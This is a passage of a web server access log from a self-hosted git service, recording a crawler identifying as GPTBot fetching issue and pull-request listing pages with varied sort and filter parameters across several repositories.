(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11270] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:19:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:19:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 